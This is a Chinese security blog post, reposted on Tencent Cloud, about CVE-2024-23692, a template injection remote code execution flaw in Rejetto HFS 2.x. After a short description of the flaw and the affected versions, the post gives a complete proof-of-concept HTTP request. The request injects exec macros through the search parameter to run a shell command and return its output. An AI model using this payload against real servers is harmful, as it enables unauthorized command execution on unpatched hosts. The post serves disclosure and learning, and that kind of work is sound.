前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2024-23692|Rejetto HFS 2.x 远程代码执行漏洞(POC)

CVE-2024-23692|Rejetto HFS 2.x 远程代码执行漏洞(POC)

作者头像
信安百科
发布2024-06-17 13:35:05
4140
发布2024-06-17 13:35:05
举报
文章被收录于专栏:信安百科信安百科

0x00 前言

HFS(HTTP File Server)是一个基于HTTP协议的文件服务器软件,允许用户通过浏览器访问和共享计算机上的文件。HFS的起源可以追溯到2002年,由Rejetto开发并发布。

HFS的主要特点包括界面简洁直观、易于安装和配置、支持虚拟文件系统、支持多种权限设置等。通过HFS,用户可以轻松地在本地网络或互联网上共享文件和文件夹,无需安装额外的软件,只需使用一个支持HTTP协议的浏览器即可访问和下载文件。

0x01 漏洞描述

根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。

此模板包含来自请求的搜索查询参数的内容,该内容未正确转义,从而启用了 SSTI 在正常操作下,符号和宏会被编码以防止 SSTI。但是,通过强制服务器取消转义某些字符,攻击者可以将任意宏注入模板。

0x02 CVE编号

CVE-2024-23692

0x03 影响版本

Rejetto HFS 2.x

0x04 漏洞详情

POC:

代码语言:javascript
复制
GET /?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: HFS_SID_=0.590236319694668

0x05 参考链接

https://github.com/rapid7/metasploit-framework/pull/19240

https://www.rejetto.com/hfs/?f=dl

本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-06-13,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档